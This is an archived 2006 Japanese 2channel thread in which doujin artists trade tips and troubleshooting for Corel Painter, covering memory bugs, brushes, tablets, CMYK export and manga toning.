5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【Painter】 ペインター@同人ノウハウNo.5

1 :スペースNo.な-74:2006/06/21(水) 05:30:51
Painterについて語って下さい。CG板の
Painter総合 20筆目【ペインター】
http://pc8.2ch.net/test/read.cgi/cg/1146779528/
の方が(ぶっちゃけ本スレ)が本格的な話題が多いですが、CG板とは少し毛色の違う(?)話をしたい時に。

前スレ
【Painter】 ペインター@同人ノウハウNo.4
http://comic6.2ch.net/test/read.cgi/2chbook/1149165854/

過去ログ
【Painter】 ペインター@同人ノウハウNo.3
http://comic6.2ch.net/test/read.cgi/2chbook/1110765596/
【Painter】 ペインター@同人ノウハウNo.2
http://comic6.2ch.net/test/read.cgi/2chbook/1073269139/
【Painter】 お絵描きソフト 【ペインター】
http://comic2.2ch.net/test/read.cgi/2chbook/1054478838/

関連スレ
【ペインター】Painter6 6.1【4缶目】
http://pc8.2ch.net/test/read.cgi/cg/1121268056/
PainterClassic/Essential バージョン3.0
http://pc5.2ch.net/test/read.cgi/cg/1098106689/

2 :スペースNo.な-74:2006/06/21(水) 05:32:12
【関連リンク】
米COREL
ttp://www.corel.com/

COREL日本法人
ttp://www.corel.jp/

Painter9 の情報 (体験版もある)
ttp://www.corel.jp/product/painter/

Painter6、6.1関連 テンプレート集
ttp://painter61j.hp.infoseek.co.jp/
Painter関連FAQ(まずはここを見よう)
ttp://painter61j.hp.infoseek.co.jp/faq.html

Painter8.1Eアップデータ(英語版)
ttp://www.corel.com/servlet/Satellite?pagename=Corel/Products/Downloads&id=1047021764853

3 :スペースNo.な-74:2006/06/21(水) 05:32:51
FAQ:よくある質問。

Q.Painter IXのデジタル水彩は6以前の水彩と同じものですか?
A.細かい描き心地は違いますが、基本的には同じものです。
 レイヤーに描ける、パスに沿って描けるなど新しい機能もあります。

Q.なぜPainter 6だけやたらと人気があるのですか?
A.6以前は人気の旧水彩を搭載しています。それに加え、
 6はメモリを1GBまで扱えて(5.5以前は512MB)、
 Photoshopユーザーに馴染み深いレイヤーを搭載(5.5以前はフローター)しているためです。

4 :スペースNo.な-74:2006/06/21(水) 05:34:00
よくある質問2

[ FAQ ]
【Q_01】ハンドツールで移動させる時に範囲選択が出てウザイ
【A_01】日本語入力をOFFにしろ

【Q_02】画面が水色や紫色でなんか変。 (Windows)
【A_02】画面のプロパティで32bitカラーにしろ。

【Q_03】縮小で補間縮小するオンしても表示が補間縮小されない。or画像が黒っぽくなる。
【A_03】Windows版 Painterでの仕様。Macintosh版ver6以下でのみ、このオプションは正常に機能する。
Painter7では、Macintosh版もWindows版もこのオプションが機能しなくなっている。

【Q_04】なんかブラシで描くと、操作からワンテンポ遅れて画面に描かれる。
【A_04】Windows版 Painter7でのみ、WindowsXPで発生するバグ。Windows2000でも出る場合がある。
ttp://painter61j.hp.infoseek.co.jp/faq.html#4辺りを参考に。
パッチがあるらしいが、パッチを当てても完全には直らない。

【Q_05】RIFFファイルが色化けしちゃう
【A_05】環境設定でMMXを無効にしれ。RIFF圧縮なしで保存しれ。


5 :スペースNo.な-74:2006/06/21(水) 05:35:41
いつのまにか落ちてたので建て

6 :スペースNo.な-74:2006/06/22(木) 01:27:56
age

7 :スペースNo.な-74:2006/06/22(木) 12:50:26
>1 乙

8 :スペースNo.な-74:2006/06/22(木) 17:43:46
タブレットのプロフェッショナルペンってどうですか?
ちょっとスレ違いですがタブレットスレが落ちてたんでこちらに書かせて貰いましたが

9 :スペースNo.な-74:2006/06/23(金) 04:11:51
>>8
Intuos2のペンと同じらしいけど?

10 :スペースNo.な-74:2006/06/24(土) 01:42:00
保守

11 :スペースNo.な-74:2006/06/26(月) 01:51:34
タブレットのシートの表面にこびりついてる物が有って
これが描いてる時に引っ掛かって線がズレる事が頻繁にあるんだけど
アルコールとかで強く擦っても取れない辺り、これは削れたフェルト芯なんかね?丁度一番接触する所に付いてるし。
シンナーとかで落ちるのかな

12 :スペースNo.な-74:2006/06/26(月) 03:28:14
重量物がカドから落ちてシートをひしゃげさせたのかも。

13 :スペースNo.な-74:2006/06/26(月) 04:49:03
プラ消しゴムカスじゃね?
あいつらはプラスチック溶かして融合する

14 :スペースNo.な-74:2006/06/27(火) 12:20:05
ダイソーマットを上からかぶせるとか

15 :スペースNo.な-74:2006/06/29(木) 01:44:01
即死ラインは何日で何レスぐらい?
setting.txt見ればわかるのかな

16 :スペースNo.な-74:2006/06/29(木) 13:23:03
=============
CPU:Pentium(R) 4 CPU 2.80GHz
Mem:既存の256MB×2 と DDR SDRAM PC2700 512MB×2 バルク品
M/B:Asus P4SD-VX
Chipset:ノースブリッジ Intel Springdale i865PE
      サウスブリッジ Intel 82801EB ICH5
VGA:NVIDIA GeForce FX 5200
VGAドライバ:nv4_disp.dll
タブレット:FAVO CTE-640/SO
タブレットドライバ:Windows V4.94-3Jwdf
モニタ:Sony PCVD-17SA1
電源:調べられませんでした。
DirectX:9.0c
OS:XP HomeEdition sp2
IME:ATOK2005
常駐アプリ:ウィルスバスター2004
その他:CD-RW、DVD-ROM

メタクリ版Painter6の日本語版をヤフオクで落札して早速インストールしてみたのですが、
1GBメモリ問題というやつで今困ってます。
6.1にアップデートしてから調べたことは全部やってみました。
(ページングファイルの設定をなしにする、
ATOKを使う、Generic MetaCreations Fixを使って起動する、
プリンタにEPSONプリンタウィンドウ3!が入ってないか調べる)

メモリ1.5GBでは起動できないのかとも思いましたがまとめサイトには結構起動報告があ

るようですし…。
もし何かわかる方がいらっしゃいましたらよろしくお願いします。

17 :スペースNo.な-74:2006/06/29(木) 23:32:32
>>16
運。

自分も2G起動してたのに、マシンの構成を替えた覚えはないけど
何かのソフトのせいか、急に立上がらなくなった。

今は5.5をマターリ使ってるよ。

18 :スペースNo.な-74:2006/06/30(金) 00:41:31
>>17
解答ありがとうございます。

運ですか…なんてこった

19 :スペースNo.な-74:2006/06/30(金) 01:12:06
>18
CG板の本スレあたりの纏めサイトに
起動阻害の原因が出てたはず。

ユーザーでは対処できないから、公式のバッチ待ちと聞いた。

20 :スペースNo.な-74:2006/07/02(日) 16:29:41
6.1使ってるんだけどメモリが256Mしかないのでつらい。
基本的に水彩しか使ってないので一時的に他の機能を
避難させて動作を軽くしたいんだけどそういうことって可能?
クラシックの購入はpsdが使えないとかスポイトが不便とか聞いたので考えてない。

21 :スペースNo.な-74:2006/07/02(日) 22:33:03
ママの肩揉んでお小遣い貰ってメモリ買うのがいんじゃね?

22 :スペースNo.な-74:2006/07/02(日) 22:33:06
クラシック購入を考えるより、メモリ購入を考えたほうが幸せになれると思うんだが。

23 :20:2006/07/03(月) 00:27:01
ノートPCなので無理です・・・
デスクトップにすりゃ良かった('A`)


24 :スペースNo.な-74:2006/07/03(月) 00:30:47
水彩っていつ乾燥させてる?
なんかビクビクしてるうちに結局最後まで乾燥しないことが多いw

25 :スペースNo.な-74:2006/07/03(月) 02:13:37
最後まで乾燥させないなぁ…
9だと水彩タッチの通常モード(?)があるので乾燥とか考えないで
それで代用してる。

ケッコウ嫌われ者の新水彩だけどオレは気に入ってる。
アレはアレであのにじみが厚塗りマンドイ時にいい具合に風合いを出してくれて好きだ〜♪

26 :スペースNo.な-74:2006/07/03(月) 02:21:39
全体を一気に描け上げられる腕があれば
下地塗り→乾燥→影塗りの繰り返しになると思うが
苦手な所は最後迄チマチマ修正しながらやってる今の工程じゃ無理

27 :スペースNo.な-74:2006/07/03(月) 05:32:54
>>26

28 :スペースNo.な-74:2006/07/03(月) 05:36:52
上のは誤爆
すまんかった
>>26
水彩は落書き程度にしか使わないが
俺はそのやり方だなぁ。
というか8使ってるんだが落ちまくるorz
4時間分の塗りがパーになった事も・・・(´・ω・`)
こまめに保存する事を教えてもらったw

29 :スペースNo.な-74:2006/07/03(月) 12:45:52
>>23
ノートPCでもメモリ増設・交換できるけど、メーカーサイトの詳細調べた?
他の機能を退避できたとしても、メモリ不足は解消できないだろうから、環境の改善が第一だと思うよ。

30 :スペースNo.な-74:2006/07/04(火) 15:45:10
6で水彩で塗ってると、次の作業(消しゴムかけとか)に移るとき
水彩で塗った範囲の中に塗った色より一段濃い色のドットが
いきなりいたる所に発生するんですが、これの原因は何ですか?
作業を進めていくと既に塗り終わったところがどんどん汚くなっていくのでストレス溜まる・・・

31 :30:2006/07/04(火) 16:41:57
後で修正すればいいと思ってそのまま作業進めてたら
いつの間にかその謎ドットが全部消えてた。わけわからんがな(´・ω・`)

32 :スペースNo.な-74:2006/07/04(火) 16:48:26
表示のバグ?

33 :スペースNo.な-74:2006/07/04(火) 19:25:59
98SEでエセ3を使っているつわものはおるか。
今98SEでペインター5.5使ってます。

34 :スペースNo.な-74:2006/07/04(火) 20:20:54
ペインターってトーンも貼れたりしますか?

35 :スペースNo.な-74:2006/07/04(火) 20:44:43
>34
パターンがあれば可能だが、パターンそのものはどっかから仕入れるか
自作するしかない。
フォトショのハーフトーンやピクセレート処理のようなものはなかったと思う

36 :スペースNo.な-74:2006/07/04(火) 20:47:43
>>35
そうですか
どうもありがとう

37 :スペースNo.な-74:2006/07/04(火) 21:54:04
>>30
それ消しゴムの水彩境界値が0以上になってるとかじゃねの?

38 :スペースNo.な-74:2006/07/05(水) 00:08:22
>>34,35
ある。ペインターでもトーンは貼れる。
貼ると言うよりはトーンチェンジャーみたいなものだが。
ttp://kaburaya.pobox.ne.jp/workshop/cases/screen_halftone.htm
ttp://kaburaya.pobox.ne.jp/workshop/cases/manga_halftone.htm

39 :スペースNo.な-74:2006/07/13(木) 04:05:41
1G以上でもいけるらしいよ。MSIME止めればいいだけらしい。
どうやって止めるのか分からんが・・・
(たぶんここでひっかかる。削除できんの?)

ATOKとか日本語環境あればMS-IME必要ないのだが


40 :スペースNo.な-74:2006/07/16(日) 13:07:38
painterの最新版の体験版って試用期間が60日なんですね。
これって起動時にチェックみたいですけど、ずっと電源いれてアプリを落とさなければ永遠につかえる気が

41 :スペースNo.な-74:2006/07/16(日) 15:09:29
アカデミック版ってアップグレード不可なんだよね?
乗り換えアップグレードかアカデミックかで死ぬほど悩んでるんだけど、
どっちが後々幸せになれますか?

42 :スペースNo.な-74:2006/07/17(月) 01:43:49
ぶっちゃけどっちも幸せにはなれないと思う。

43 :スペースNo.な-74:2006/07/17(月) 08:57:46
そんな事は無い

44 :スペースNo.な-74:2006/07/17(月) 11:08:10
painterは9.5で完成でいいんじゃないかな。・・・もういいかと。

45 :スペースNo.な-74:2006/07/17(月) 15:42:46
そう言いたいところだけども
それぞれのウィンドウのサイズを、もう少し自由にさせてもらえるまでは、まだまだ。

46 :スペースNo.な-74:2006/07/17(月) 18:54:17
とりあえず、UniversalBinaryになってくれ。
話はそれからだ。

47 :スペースNo.な-74:2006/07/17(月) 18:58:58
dual coreに対応してたっけ?
してなければ対応して欲しい。あと倍率変更時の画質とか

48 :スペースNo.な-74:2006/07/17(月) 21:41:02
PNGまだ使えないの?

49 :スペースNo.な-74:2006/07/18(火) 15:13:49
次期Painter(X)βテスター募集に、必要マシンおよびCPU構成が掲載されてる
ttp://www.corel.com/servlet/Satellite?pagename=Corel3/Section/Display&sid=1047024315119&gid=1047024366778

守秘義務の厳守(住所実名連絡先の登録が必要)と英語力に自信のある人は
応募してどんどん要望だしてみたら?

50 :スペースNo.な-74:2006/07/19(水) 07:51:07
すみません、初心者な質問で申し訳ないのですが一つお聞かせください。
http://jajatom.moo.jp/frame.html
上記URLの先にある画像下部にピアノの鍵盤のようなカラーパレット(?)がありますが、
これはどのようにして表示させるのでしょうか 。
バージョンは8、OSはMac OS10.3.9です。

51 :スペースNo.な-74:2006/07/19(水) 11:20:57
>>50
カラーセットのことですね。Painter 8 でインタフェースが変更になって、カラーセットの
サイズや縦横の色数の指定が効かなくなりました。リンクの画像では Painter 6 を使ってますね。

52 :スペースNo.な-74:2006/07/19(水) 13:18:33
ttp://deaikei.biz/up/up/1235.jpg.html
受信pass painter

こういう感じでいいなら8以降でもできるみたい

53 :スペースNo.な-74:2006/07/22(土) 00:13:09
PainterIXです
画面右上にある↓がたまに消えることがあるんですが
http://syobon.com/mini/src/mini26476.jpg
消しちゃった場合どうやって復帰させるのでしょうか?
いちいちデフォルト配置に戻すのが面倒で・・・


54 :スペースNo.な-74:2006/07/22(土) 07:26:01
>>53
[ウィンドウ] → [ブラシセレクタの表示] で出るだろ。

既に出てるときは [ブラシセレクタを隠す] になってるはず。
とりあえずウィンドウで表示・非表示できるの全部試せw

55 :スペースNo.な-74:2006/07/22(土) 10:13:05
>>54
(´・ω・`)あざーっす

56 :50:2006/07/22(土) 23:15:48
>>51さん
返事が相当遅くなって申し訳ありません、丁寧に教えてくださりありがとうございました。
結局9.5を買いました。
これでカラーセットというものが使えるのか調べてはいませんが、評判の良い9.5に期待
しつついじってみます。

57 :スペースNo.な-74:2006/07/23(日) 22:35:26
俺ペインターは自分で買ったことない。
昔は友人にもらい今はP2P。

58 :スペースNo.な-74:2006/07/23(日) 23:14:56
       _, -‐-、___
     /  `   ` _ )
   / ̄  _,,ニ=‐─'´ー''',、
   ゝ-┬l;;;        ヽ
    l// |;;         _l
    l ,./;;   (ニ=、  , ,=ニ
   /イr'ヽ;   ー=o、', ', ro'l
   ノ/ l l、!l   `'''''  ヽ`´!
  . レ  〉、`ヽ     ノー-‐' l
      lゝノ''l    ,イメ三ヾ、!
     /、 l ヽ   〃 ,,, リ,,/l!
   , -l:::ヽヽ、 ヽ、,l!___l;;;;;;;;;lヽ、
  ´   l::::::ヽ ヽ`ー─ヽ;;;;;;l::l `''ー、_
     ヽ::::::::ヽ ヽ_/ヽ;;l::lヽ
     ヽ:::::::::::ヽヽ__/'´;;;;l!:/ ヽ

       通 報[Zin hau]
     (1551〜1604 中国)

59 :スペースNo.な-74:2006/07/23(日) 23:21:32
あまりに使い古された釣りにびっくりしたじゃないか。

60 :スペースNo.な-74:2006/07/26(水) 20:21:09
初歩的質問なのですが、
本の表紙イラストを塗っています。
ペインターで色を塗ってフォトショで仕上げたいと思うんですが
ペインターでCMYK保存した後フォトショで開こうとすると
作業用スペースと一致しないとエラー?が出ます。
「カラーを作業スペースに変換」すると開くんですが、
色味がかなりかわってしまって・・・

表紙イラストをペインターで作っている人は、どんな風に作ってるんでしょうか?


61 :スペースNo.な-74:2006/07/26(水) 22:15:21
ペインターでCYMK保存せず、
フォトショの読み込みではカラープロファイルをいじらずに読み込み、
フォトショ上でCYMK変換すればいいと思うよ。

62 :スペースNo.な-74:2006/07/27(木) 00:55:15
CMYKのペインター

63 :スペースNo.な-74:2006/08/04(金) 01:47:54
最近使い始めたのですが
みなさんはどのツールを使って描いてらっしゃいますか?
兎t-ルがあまりにも多くて自分に合ったのを探しているのですが
少々途方に暮れています。
よろしかったら教えて頂きたい。

64 :スペースNo.な-74:2006/08/04(金) 01:48:48
兎t-ルって何だorz
ツールです

65 :スペースNo.な-74:2006/08/05(土) 05:35:15
デジタル水彩、オイルパステル、エアブラシ、パステル、消しゴム
こんなもんだな、ほかのはあまり使わん。


66 :スペースNo.な-74:2006/08/05(土) 05:52:16
全部カスタム
1 下書きから本塗りまでこなすレンダー系のブラシ
2 描きこみ用の入り抜きのついたブラシ(不透明)
3 ぼかしブラシ(水滴系)
4 ペン入れ用のアンチエイリアスのかからない入り抜きのついたブラシ(カリグラフィ系)
5 テクスチャに反応する大サイズ用のブラシ(水彩系)
6 エアブラシ系のブラシ
7 マーカー系のブラシ

主に使うのはこんなとこ
ほとんど1と3で進める

67 :スペースNo.な-74:2006/08/06(日) 00:04:24
主線はアナログで描いて取り込みなので、使うのは塗りだけ。
殆どデジタル水彩の幅広ブラシ(だったかな)。
ちょこちょことエアブラシ、パステル、エンピツ、消しゴム。
色々ためしたけど、結局それぐらいしか自分には必要なさそうだった。

68 :スペースNo.な-74:2006/08/06(日) 02:34:24
9.5お試し落として使ったら
落ちまくって使えなかったorz


69 :スペースNo.な-74:2006/08/06(日) 09:50:05
自分のメインはティントと木炭、水滴系、消しゴム。
気分転換に普段使わないブラシで落書きしたりするのも、それはそれで面白いけど。

>>68
スペックが足りないとかじゃないよね?
ウチの環境では、6よりは落ちる回数少ないんだけど・・・

70 :スペースNo.な-74:2006/08/06(日) 10:08:33
要するにみんな

透明系+不透明系+ぼかしorエアブラシ+消しゴム+α

ってことだな

71 :スペースNo.な-74:2006/08/06(日) 13:19:19
>>68
nyでって事か?それとも9からうのpデトか?
前者なら問題なく動くよw

72 :スペースNo.な-74:2006/08/07(月) 01:37:05
お試し版をなんでnyで落とすんだよアホか

73 :スペースNo.な-74:2006/08/07(月) 02:05:13
>>71
通報しますた

74 :スペースNo.な-74:2006/08/07(月) 02:41:49
>>72
誰もお試し版なぞ言ってないがw

75 :スペースNo.な-74:2006/08/07(月) 08:08:58
>>74
69なら「9.5お試し」と言ってるが・・・

いや、書いてるだけで言ってはないのか。そうか。

76 :スペースNo.な-74:2006/08/07(月) 08:50:00
マジレスすると
9.5を試し(に)落として使ったら
の書き間違いではないかと予想

77 :スペースNo.な-74:2006/08/07(月) 22:01:17
painter9のデジタル水彩でマスク使うと
余裕で無視されてはみ出るのは仕様ですか?

78 :スペースNo.な-74:2006/08/17(木) 17:48:24
painterで漫画制作してる人っている?
>>38を見る限りできないことはないみたいだが
やはり他のソフトを併用するのが現実的な手段なんかな

79 :スペースNo.な-74:2006/08/17(木) 18:16:06
グレスケモードないからモノクロ作業は現実的ではない
選択範囲の選択も遅いしね
使うなら、削りの一部ぐらいかな


80 :スペースNo.な-74:2006/08/17(木) 19:18:52
>>78
線画までなら使ってる人はそこそこにいる
アナログ的なドットのトーン貼りとなると限りなくゼロに近い
(少なくとも俺は聞いた事がない)
同人なんかでドットにする必要がないなら仕上げまで使ってる人はたまにいる

81 :スペースNo.な-74:2006/08/17(木) 20:22:27
ペインターはカスタムで作ったブラシが最強。
カケアミとか点描とかもんのすごく省力化出来た。
これでグレーを削ったりグレーのカケアミを重ねたり。
RGBならではのファイルのでかさや選択範囲のショボさを補って余りある。
フォトショとの連携は欠かせないけどね。
いちいち起動し直さなきゃならないマシンでも実用出来たし
同時起動が出来るマシンならストレスフリーだろう。

ペインターの線は300dpiから600、1200に引き延ばしても平気。

82 :スペースNo.な-74:2006/08/17(木) 22:38:16
マシンスペックがそうとういるから
あまり現実的ではないよな

83 :スペースNo.な-74:2006/08/17(木) 23:39:06
G3,600Mhz、メモリー512Mb、OS9のペインタ8でプロ原稿作った俺が来ましたよ。

84 :スペースNo.な-74:2006/08/17(木) 23:57:10
↑それってグレスケ入稿だろ?
なんの参考にもならんよ

カケアミは俺もペインターでしてるな

85 :83:2006/08/18(金) 03:48:32
なぜグレスケと決めつけるかね?
最終的にはフォトショで2値モード1200dpiにしてるよ。

86 :スペースNo.な-74:2006/08/18(金) 11:35:33
いよいよPainter X Beta(抽選制)の配布が始まるらしい。
IntelMacに対応したら、やっとG3 iBook(OS9)&Painter5.5から卒業できる

87 :スペースNo.な-74:2006/08/18(金) 15:29:33
>>79-85
お答えありがとうございました
参考になりました

88 :スペースNo.な-74:2006/08/18(金) 16:49:32
9.5で満足している・・・しているんだよ、重くなければ。
なんとか軽くしてほしい。

かといってどこの機能はいらないとかなると
エッセンシャルとかそんな感じになるのかなぁ。
廉価版みないなかんじで

89 :スペースNo.な-74:2006/08/21(月) 14:33:21
ペンタブのペンの人差し指で操作するボタンに
消しゴム割り当てて使ってると
消しゴムで消す時たまに斜めに太い実線が入るのなんでだろ

90 ::2006/08/26(土) 20:54:37
dfldf;ld



ere:w;r;we




rew:r;we:




321:];32;1:



ew:;]ew:q]



ew;:qew:q



dfdsfs


91 :スペースNo.な-74:2006/08/28(月) 11:33:50
とりあえず、Painter XはUniversal Binary化されるそうだ。
あとはAdobeの新バージョンさえ出れば、Mac miniやMac Bookに乗り換えできる…。
コミスタの対応は期待しないことにした。

92 :スペースNo.な-74:2006/08/28(月) 11:46:06
>>91
ソースどこ?

93 :スペースNo.な-74:2006/08/28(月) 12:40:11
ペインター━━━━(゚∀゚)━━━━ !!!!! Part5
 ttp://pc7.2ch.net/test/read.cgi/mac/1144335989/257

今回のベータテスターは守秘義務をぼろぼろ漏らしすぎだ。

94 :スペースNo.な-74:2006/08/29(火) 09:41:20
流れぶったぎりですんません。

Painter7のWin版使ってるんだけど、うっかりブラシ設定バックアップ忘れて
OSの再インストールしちゃったのです。

仕方なく最初からブラシ作ってるんですが、
どうしても二値ペン(アンチエイリアスのかかってない付けペン風のペン)が出来ないです。
どのペンのどの項目をいじればいいのか、
どなたか教えて下さいm(_ _)m

95 :スペースNo.な-74:2006/08/29(火) 14:49:58
ヒント:過去のヴァージョンのブラシフォルダ

96 :94:2006/08/29(火) 19:03:46
>>95
ありがとうです!
ヒントを元に弄んだところ、無事に出来ました。

また何かあったらよろしくお願いしますー!



97 :スペースNo.な-74:2006/08/30(水) 06:12:22
6がバンドルされているパソコンを貰った


98 :スペースNo.な-74:2006/08/30(水) 12:26:20
VAIOか。いいものもらったな。

99 :q:2006/08/31(木) 14:56:20
ds:]ad



e:qw]e:wq



sadsa;



qweqweqw



dsaadas



hgcfghfg



jkhhjh;l


100 :スペースNo.な-74:2006/09/08(金) 11:34:00
なんで標準だと筆圧無視なんだろ


101 :スペースNo.な-74:2006/09/08(金) 13:48:58
なあ、ちょっと聞きたいんだけど

線画でこう、線自体に濃淡がついてるようなのあるだろ?
あれってどのツールで描いてるんだ?

102 :スペースNo.な-74:2006/09/08(金) 14:59:20
>>101
線の色変えするときに濃淡をつけるとか(自分はこれ。ブリーチやらダークナーやらで)
線画用のバリアントの表現設定の「不透明度」を「なし」以外の何か(たとえば「筆圧」)に設定して描くとか
あらかじめそういう設定のバリアント探して使うとか
いろいろ方法はあるから一概には言えないのではなかろうか。

103 :スペースNo.な-74:2006/09/08(金) 22:11:52
うーんそうなのか。
レスありがとう。早速試してみるよ!!

104 :スペースNo.な-74:2006/09/08(金) 22:50:09
>>101参考までに
線画のレイヤーを乗算にして透明度を維持をチェック
薄くしたい部分を白い色で描くとそこは透明になっていく
濃度を明度でコントロールできて部分部分で色相も変えれる
消しすぎたと思ったら塗りなおせる
ツールは塗りつぶし系ならなんでもおk

でも乗算なので
選択したとおりの色で線画を塗れないのと
塗りによっては境界が汚くなるかも

105 :スペースNo.な-74:2006/09/09(土) 23:11:40
おまいらせめて描画モードの種類と意味くらいマニュアル読んで憶えとこうよ。
>>101
線画、多分黒だと思うから比較(明)のレイヤーを上に置いて塗ってみ。線画より薄い色で。

106 :スペースNo.な-74:2006/09/10(日) 02:33:55
インテュオス3を買った時にペインターの体験版?「ペインターエッセンシャル2」
というのがついてました。油絵っぽく塗るのが好きなので早速使ってみたのですが・・・
一番下の線画レイヤーが上に移動出来ません。(キャンバスという名のレイヤーです)
ロックされているみたいなのですが...マニュアルもついてないので対処法が分かりません

アップグレードにしないと出来ないのでしょうか?
クラシックで出来ますか?

107 :スペースNo.な-74:2006/09/10(日) 03:14:57
キャンバスという名のレイヤーではなく
レイヤーとキャンバスは別物

108 :106:2006/09/10(日) 03:49:05
107さんありがとう!
なんとか線画のレイヤーを一番上に移動させることができました。
しかし、レイヤーの設定(フォトショで言う乗算とかオバーレイとかが)出来ません。
体験版だからかな?

109 :スペースNo.な-74:2006/09/12(火) 18:09:12
ペインター難しいね

110 :スペースNo.な-74:2006/09/12(火) 20:18:18
>108
はい、高いペインターは乗算に変更できます。

線画はキャンバスに置いたままで、レイヤーに色を塗ってみて。

111 :スペースNo.な-74:2006/09/13(水) 00:11:15
108さん
エッセンシャル3で自分がやってる方法ですが多分2でも出来ると思います。

1.線画はキャンパス上に描く
2.新規レイヤーを作り、そのレイヤー上をデジタル水彩又は鉛筆で描く
 (一番いいのは色がつかないので水彩消しゴム)
3.レイヤー名の横の紙が重なった様な絵が赤くなったらOK
4.ファイル→クローンソースで描いているファイルを選ぶ
5.先ほどのレイヤーに塗りつぶしツール(選択はクローンソースで)で塗りつぶす
6.旨い事いったらキャンパス上の線画は消す

紙が重なった様な絵が赤くなっているのが乗算レイヤーだそうです。
エッセンシャルでは途中で変更できません。

112 :スペースNo.な-74:2006/09/13(水) 03:16:30
どうしてもシャンプー思い出す

113 :スペースNo.な-74:2006/09/27(水) 01:33:33
パッションage

114 :スペースNo.な-74:2006/09/28(木) 04:51:40
グリス鉛筆がレイヤーに書き込めないんですけど
マニュアルにも載ってないし、どうなってるんでしょ?

115 :スペースNo.な-74:2006/09/28(木) 05:37:08
バージョンは

116 :スペースNo.な-74:2006/09/28(木) 06:30:12
バージョンは8です。
XPでメモリは1G
他の鉛筆で描いた上をグリスでなぞると
さっぴつのようになるので
何か自分が根本的なとこで勘違いしてるのかもしれなせん。

117 :スペースNo.な-74:2006/09/28(木) 11:02:21
グリス鉛筆って、手法が「滴り」だからじゃないか?
手法を変えるか、滴り以外の手法のバリアントで描いてみそ。

118 :スペースNo.な-74:2006/09/29(金) 02:11:52
PainterXβ配布始まった
IntelMacユーザー、触ってみて。驚くよ

119 :スペースNo.な-74:2006/09/29(金) 06:18:27
>117
バリアントを編集でうまく行きました。
勉強になりました。

 「俺はまだ転がり出したばかりだぜ!
この果てし無く遠いペインタ坂という名の坂をな!」

120 :スペースNo.な-74:2006/09/29(金) 20:00:31
>118
一体なにが驚くの?dkdk


121 :スペースNo.な-74:2006/09/29(金) 20:07:57
>118
どこで配布してる?
corel本家とかにも行ってみたけど分からなかった・・・
UB化したらしいから早く触ってみたい。

122 :スペースNo.な-74:2006/09/29(金) 20:52:27
あらかじめCorelのβテスター応募フォームから応募してないと
貰えない(カナダから郵送される)。

123 :スペースNo.な-74:2006/09/29(金) 21:27:27
それのことだったのか。
その話題は先月末に終わったみたいだったから、一般向け配布が始まったのかと思ったのにorz

124 :スペースNo.な-74:2006/09/29(金) 23:09:18
で何が驚くの?

125 :スペースNo.な-74:2006/09/30(土) 00:21:29
箱開けたらびっくり箱だとか、電流が流れるとかじゃないの?

126 :スペースNo.な-74:2006/09/30(土) 00:33:27
バージョンが若返ったりして(X→6)

127 :スペースNo.な-74:2006/09/30(土) 01:09:44
それなら速攻買うw

128 :スペースNo.な-74:2006/10/01(日) 21:11:02
びっくりレポートまだー?

129 :スペースNo.な-74:2006/10/02(月) 11:16:14
ベータテスターの要項で「守秘義務」を守らされるから、何も話せないの

130 :スペースNo.な-74:2006/10/02(月) 15:10:27
ダースベーダーの要項に見えた

131 :スペースNo.な-74:2006/10/03(火) 10:50:07
*************【 急 募!! 】*************
仕事内容 : 侵略(主に元老院議員の誘拐、詳細テキスト有)
就労時間 : 二交代制
勤 務 地 : 銀河帝国全域 辺境出張有。
給   与 : 応 談 (結果に応じてボーナスあり)
採用条件 : 経験者・フォース技能所持者優遇
         体毛の多い方、共和国支持の方はご遠慮ください。
         暗黒面に興味がある方。
        年齢不問。

申込み先 :ルーカススタジオ (担当:ジョージ)
***************************************
こんな感じか?

132 :スペースNo.な-74:2006/10/03(火) 23:37:59
多分契約社員だな
正社員登用有とか描いてるけど、実際はめったにないんだ

133 :スペースNo.な-74:2006/10/04(水) 14:17:23
ペインターとかの画像制作編集ソフト使うときって
ぶっちゃけデュアルコアCPUの恩恵ある?
絵描きながら裏で別のソフトを走らせたりするときだけだっけ?

134 :スペースNo.な-74:2006/10/04(水) 18:17:49
>>133
そそ

135 :スペースNo.な-74:2006/10/06(金) 15:45:16
相談にのってくれ。

漫画のペン入れの為に
コミスタかペインタかで迷ってるんだが
どっちがいいかね?

トーン処理とかその他の処理は
フォトショ+パワトンでやってるから
純粋にペン入れの為だけに欲しい。

マカー(OSX G4 800dual)なのでSAIの選択はできない。

136 :スペースNo.な-74:2006/10/06(金) 16:01:53
つ体験版

137 :スペースNo.な-74:2006/10/06(金) 16:21:39
>>135
136の言うとおり、体験版使ってお好みのほうを選択しろとしか。
コミスタもPainterも癖のあるソフトだから、どちらが向くかは好みの問題。

138 :スペースNo.な-74:2006/10/06(金) 18:51:18
>>135
俺はコミスタでペン入れ、彩色はPainterでやってる。
ペン入れだけに限ればコミスタお勧め。

139 :スペースNo.な-74:2006/10/06(金) 21:26:56
体験版はどっちも使ったけど
2〜3週間使ったレベルじゃどっちもかわらねって感じ
この手の事は使い込まないとわからない所もあるから
痒い所に手が届くみたいなのはどっちかと思って聞いた。


140 :スペースNo.な-74:2006/10/07(土) 00:29:31
ペインターでカラーをメインに描く予定がないなら
コミスタの方が後々役に立つんじゃないか?
ペン入れのためだけにペインターは勿体無いし
金が…w

141 :スペースNo.な-74:2006/10/07(土) 00:36:47
>>139
その「かゆいところ」が人それぞれだからなあ。

自分は、マジックワンドの「隙間を閉じる」オプションがあるから、ペン入れだけじゃなくて
パーツのレイヤー分けまでコミスタでやってるけど・・・
(ProとEXにしか無い機能だから注意)

142 :y:2006/10/10(火) 14:26:12
l;kafl;sklks




rwerwewr




sdfsdfsdfs




rwewewerwe



gffgdfggdf




trerterter



errtete


143 :スペースNo.な-74:2006/10/14(土) 17:59:43
6から8に乗り換えたんだけど
入りと抜きっていうの、最小サイズいくら小さくしても%変えても
できないのはなんでなの?

説明書にも載ってないんですが、皆さんどうしてます?
そういうのができる専用のブラシがあるのか、
もう、新しいマック買って9。5入れるか悩んでいます。

144 :スペースNo.な-74:2006/10/14(土) 18:22:34
>>143
最小サイズの設定に加えて表現設定を「筆圧」にしたら良いんじゃないかな
(9.5で試してるので8とはまた違うかも)

145 :143:2006/10/14(土) 18:45:50
すいません、再起動したら問題なく出来ました。
ありがとうございます。なんなんだー俺

146 :スペースNo.な-74:2006/10/14(土) 18:50:37
最近はあんまならないけど
たまーに筆圧効かなくなることあったね
タブレットのドライバの方にも原因あるかも

147 :スペースNo.な-74:2006/10/20(金) 13:23:09
業務連絡
